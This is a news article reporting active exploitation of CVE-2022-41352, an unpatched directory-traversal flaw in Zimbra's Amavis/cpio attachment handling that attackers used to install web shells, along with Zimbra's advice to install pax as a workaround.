An unpatched code-execution vulnerability in the Zimbra Collaboration software is under active exploitation by attackers using the attacks to backdoor servers.
The attacks began no later than September 7, when a Zimbra customer reported a few days later that a server running the company's Amavis spam-filtering engine processed an email containing a malicious attachment. Within seconds, the scanner copied a malicious Java file to the server and then executed it. With that, the attackers had installed a web shell, which they could then use to log into and take control of the server.
Zimbra has yet to release a patch fixing the vulnerability. Instead, the company published this guidance that advises customers to ensure a file archiver known as pax is installed. Unless pax is installed, Amavis processes incoming attachments with cpio, an alternate archiver that has known vulnerabilities that were never fixed.
"If the pax package is not installed, Amavis will fall-back to using cpio," Zimbra employee Barry de Graaff wrote. "Unfortunately the fall-back is implemented poorly (by Amavis) and will allow an unauthenticated attacker to create and overwrite files on the Zimbra server, including the Zimbra webroot."
The post went on to explain how to install pax. The utility comes loaded by default on Ubuntu distributions of Linux, but must be manually installed on most other distributions. The Zimbra vulnerability is tracked as CVE-2022-41352.
The zero-day vulnerability is a byproduct of CVE-2015-1197, a known directory traversal vulnerability in cpio. Researchers for security firm Rapid7 said recently that the flaw is exploitable only when Zimbra or another secondary application uses cpio to extract untrusted archives.